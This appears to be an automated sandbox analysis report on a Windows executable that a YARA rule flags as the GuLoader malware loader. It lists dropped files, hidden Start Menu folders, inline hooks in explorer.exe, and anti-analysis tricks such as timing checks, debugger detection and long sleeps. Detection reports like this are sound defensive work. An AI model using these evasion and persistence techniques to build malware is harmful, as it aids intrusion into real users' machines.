      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile written: C:\Users\user\AppData\Local\Temp\reinhold.iniJump to behavior
      Source: jU0hAXFL0k.exeStatic file information: File size 1272864 > 1048576
      Source: jU0hAXFL0k.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: wntdll.pdbUGP source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: jU0hAXFL0k.exe, 0000000C.00000003.2064065483562.00000000376E4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe
      Source: Binary string: mshtml.pdbUGP source: jU0hAXFL0k.exe, 0000000C.00000001.2063871128101.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: cmd.pdb source: cmd.exe

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000005.00000002.2064063985138.0000000009FD3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_6FE92F60 push eax; ret 5_2_6FE92F8E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D771ED push ecx; ret 15_2_00D77200
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D7722B push ecx; ret 15_2_00D7723E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE08CD push ecx; mov dword ptr [esp], ecx15_2_03AE08D6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEEA0F push ss; ret 15_2_02DEEA11
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEE0F6 push ss; ret 15_2_02DEE0F7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEA878 push eax; retf 15_2_02DEA87D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DEDFE1 push eax; iretd 15_2_02DEDFE2
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_02DED4B5 push eax; ret 15_2_02DED508
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_6FE91A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,5_2_6FE91A98
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\KoalitionensJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\DagtjenestenJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\KwannonJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\DissympathisesJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\ReformattingJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Spongiform.ForJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Megapterine.bucJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\Engroshandlerne.agrJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\haves.antJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\laggin.telJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Dagtjenesten\Kwannon\Dissympathises\Reformatting\regneoperatorers.txtJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\UnconstraintJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\OpskolingersJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Koalitionens\Unconstraint\Opskolingers\unintriguing.tieJump to behavior

      Hooking and other Techniques for Hiding and Protection

      barindex
      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE5
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\explorer.exe TID: 3456Thread sleep count: 111 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3456Thread sleep time: -222000s >= -30000sJump to behavior
      Source: C:\Windows\explorer.exe TID: 3456Thread sleep count: 9864 > 30Jump to behavior
      Source: C:\Windows\explorer.exe TID: 3456Thread sleep time: -19728000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012Thread sleep count: 118 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012Thread sleep time: -236000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012Thread sleep count: 9852 > 30Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exe TID: 4012Thread sleep time: -19704000s >= -30000sJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exeLast function: Thread delayed
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 rdtsc 15_2_03B21763
      Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 9864Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 879Jump to behavior
      Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 878Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeWindow / User API: threadDelayed 9852Jump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeAPI coverage: 0.8 %
      Source: C:\Windows\SysWOW64\cmd.exeProcess information queried: ProcessInformationJump to behavior
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_004062DD FindFirstFileA,FindClose,5_2_004062DD
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,5_2_004057A2
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_00402765 FindFirstFileA,5_2_00402765
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D7589A FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,FindNextFileW,FindClose,GetLastError,FindClose,15_2_00D7589A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D74EC1 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,15_2_00D74EC1
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D83E66 FindFirstFileW,FindNextFileW,FindClose,15_2_00D83E66
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D70207 FindFirstFileW,FindClose,memcpy,_wcsnicmp,_wcsicmp,memmove,15_2_00D70207
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6532E GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPAX@Z,FindNextFileW,??_V@YAXPAX@Z,SetLastError,??_V@YAXPAX@Z,GetLastError,FindClose,15_2_00D6532E
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeAPI call chain: ExitProcess graph end nodegraph_5-4773
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeAPI call chain: ExitProcess graph end nodegraph_5-4924
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D82E37 IsDebuggerPresent,15_2_00D82E37
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeCode function: 5_2_6FE91A98 LdrInitializeThunk,GlobalAlloc,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,lstrcpyA,GlobalFree,LdrInitializeThunk,GlobalFree,GlobalFree,GlobalFree,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,GlobalFree,LdrInitializeThunk,LdrInitializeThunk,lstrcpyA,LdrInitializeThunk,LdrInitializeThunk,GetModuleHandleA,LdrInitializeThunk,LoadLibraryA,GetProcAddress,lstrlenA,5_2_6FE91A98
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D6DCD0 GetProcessHeap,HeapAlloc,15_2_00D6DCD0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B21763 rdtsc 15_2_03B21763
      Source: C:\Users\user\Desktop\jU0hAXFL0k.exeProcess token adjusted: DebugJump to behavior
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_00D8C1FA mov eax, dword ptr fs:[00000030h]15_2_00D8C1FA
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5C3B0 mov eax, dword ptr fs:[00000030h]15_2_03B5C3B0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE93A6 mov eax, dword ptr fs:[00000030h]15_2_03AE93A6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE93A6 mov eax, dword ptr fs:[00000030h]15_2_03AE93A6
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0A390 mov eax, dword ptr fs:[00000030h]15_2_03B0A390
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0A390 mov eax, dword ptr fs:[00000030h]15_2_03B0A390
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0A390 mov eax, dword ptr fs:[00000030h]15_2_03B0A390
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]15_2_03AE1380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]15_2_03AE1380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]15_2_03AE1380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]15_2_03AE1380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE1380 mov eax, dword ptr fs:[00000030h]15_2_03AE1380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]15_2_03AFF380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]15_2_03AFF380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]15_2_03AFF380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]15_2_03AFF380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]15_2_03AFF380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFF380 mov eax, dword ptr fs:[00000030h]15_2_03AFF380
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F38A mov eax, dword ptr fs:[00000030h]15_2_03B9F38A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B133D0 mov eax, dword ptr fs:[00000030h]15_2_03B133D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B143D0 mov ecx, dword ptr fs:[00000030h]15_2_03B143D0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B643D5 mov eax, dword ptr fs:[00000030h]15_2_03B643D5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE63CB mov eax, dword ptr fs:[00000030h]15_2_03AE63CB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADC3C7 mov eax, dword ptr fs:[00000030h]15_2_03ADC3C7
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADE3C0 mov eax, dword ptr fs:[00000030h]15_2_03ADE3C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADE3C0 mov eax, dword ptr fs:[00000030h]15_2_03ADE3C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADE3C0 mov eax, dword ptr fs:[00000030h]15_2_03ADE3C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADE328 mov eax, dword ptr fs:[00000030h]15_2_03ADE328
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADE328 mov eax, dword ptr fs:[00000030h]15_2_03ADE328
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADE328 mov eax, dword ptr fs:[00000030h]15_2_03ADE328
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB3336 mov eax, dword ptr fs:[00000030h]15_2_03BB3336
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B18322 mov eax, dword ptr fs:[00000030h]15_2_03B18322
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B18322 mov eax, dword ptr fs:[00000030h]15_2_03B18322
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B18322 mov eax, dword ptr fs:[00000030h]15_2_03B18322
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0332D mov eax, dword ptr fs:[00000030h]15_2_03B0332D
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD9303 mov eax, dword ptr fs:[00000030h]15_2_03AD9303
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD9303 mov eax, dword ptr fs:[00000030h]15_2_03AD9303
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1631F mov eax, dword ptr fs:[00000030h]15_2_03B1631F
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F30A mov eax, dword ptr fs:[00000030h]15_2_03B9F30A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]15_2_03B6330C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]15_2_03B6330C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]15_2_03B6330C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6330C mov eax, dword ptr fs:[00000030h]15_2_03B6330C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFE310 mov eax, dword ptr fs:[00000030h]15_2_03AFE310
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFE310 mov eax, dword ptr fs:[00000030h]15_2_03AFE310
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AFE310 mov eax, dword ptr fs:[00000030h]15_2_03AFE310
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]15_2_03B5E372
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]15_2_03B5E372
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]15_2_03B5E372
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E372 mov eax, dword ptr fs:[00000030h]15_2_03B5E372
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60371 mov eax, dword ptr fs:[00000030h]15_2_03B60371
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60371 mov eax, dword ptr fs:[00000030h]15_2_03B60371
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B0237A mov eax, dword ptr fs:[00000030h]15_2_03B0237A
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]15_2_03AEB360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]15_2_03AEB360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]15_2_03AEB360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]15_2_03AEB360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]15_2_03AEB360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEB360 mov eax, dword ptr fs:[00000030h]15_2_03AEB360
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1E363 mov eax, dword ptr fs:[00000030h]15_2_03B1E363
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A350 mov eax, dword ptr fs:[00000030h]15_2_03B1A350
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD8347 mov eax, dword ptr fs:[00000030h]15_2_03AD8347
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD8347 mov eax, dword ptr fs:[00000030h]15_2_03AD8347
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD8347 mov eax, dword ptr fs:[00000030h]15_2_03AD8347
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD92AF mov eax, dword ptr fs:[00000030h]15_2_03AD92AF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]15_2_03BBB2BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]15_2_03BBB2BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]15_2_03BBB2BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BBB2BC mov eax, dword ptr fs:[00000030h]15_2_03BBB2BC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA92AB mov eax, dword ptr fs:[00000030h]15_2_03BA92AB
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9F2AE mov eax, dword ptr fs:[00000030h]15_2_03B9F2AE
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADC2B0 mov ecx, dword ptr fs:[00000030h]15_2_03ADC2B0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B042AF mov eax, dword ptr fs:[00000030h]15_2_03B042AF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B042AF mov eax, dword ptr fs:[00000030h]15_2_03B042AF
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B5E289 mov eax, dword ptr fs:[00000030h]15_2_03B5E289
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7290 mov eax, dword ptr fs:[00000030h]15_2_03AE7290
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7290 mov eax, dword ptr fs:[00000030h]15_2_03AE7290
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE7290 mov eax, dword ptr fs:[00000030h]15_2_03AE7290
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD2EC mov eax, dword ptr fs:[00000030h]15_2_03ADD2EC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADD2EC mov eax, dword ptr fs:[00000030h]15_2_03ADD2EC
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD72E0 mov eax, dword ptr fs:[00000030h]15_2_03AD72E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AEA2E0 mov eax, dword ptr fs:[00000030h]15_2_03AEA2E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AE82E0 mov eax, dword ptr fs:[00000030h]15_2_03AE82E0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AF02F9 mov eax, dword ptr fs:[00000030h]15_2_03AF02F9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B132C0 mov eax, dword ptr fs:[00000030h]15_2_03B132C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B132C0 mov eax, dword ptr fs:[00000030h]15_2_03B132C0
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BB32C9 mov eax, dword ptr fs:[00000030h]15_2_03BB32C9
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B032C5 mov eax, dword ptr fs:[00000030h]15_2_03B032C5
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B00230 mov ecx, dword ptr fs:[00000030h]15_2_03B00230
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60227 mov eax, dword ptr fs:[00000030h]15_2_03B60227
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60227 mov eax, dword ptr fs:[00000030h]15_2_03B60227
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B60227 mov eax, dword ptr fs:[00000030h]15_2_03B60227
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A22B mov eax, dword ptr fs:[00000030h]15_2_03B1A22B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A22B mov eax, dword ptr fs:[00000030h]15_2_03B1A22B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B1A22B mov eax, dword ptr fs:[00000030h]15_2_03B1A22B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6B214 mov eax, dword ptr fs:[00000030h]15_2_03B6B214
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B6B214 mov eax, dword ptr fs:[00000030h]15_2_03B6B214
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADA200 mov eax, dword ptr fs:[00000030h]15_2_03ADA200
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03AD821B mov eax, dword ptr fs:[00000030h]15_2_03AD821B
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B9D270 mov eax, dword ptr fs:[00000030h]15_2_03B9D270
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03B7327E mov eax, dword ptr fs:[00000030h]15_2_03B7327E
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB273 mov eax, dword ptr fs:[00000030h]15_2_03ADB273
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB273 mov eax, dword ptr fs:[00000030h]15_2_03ADB273
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03ADB273 mov eax, dword ptr fs:[00000030h]15_2_03ADB273
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
      Source: C:\Windows\SysWOW64\cmd.exeCode function: 15_2_03BA124C mov eax, dword ptr fs:[00000030h]15_2_03BA124C
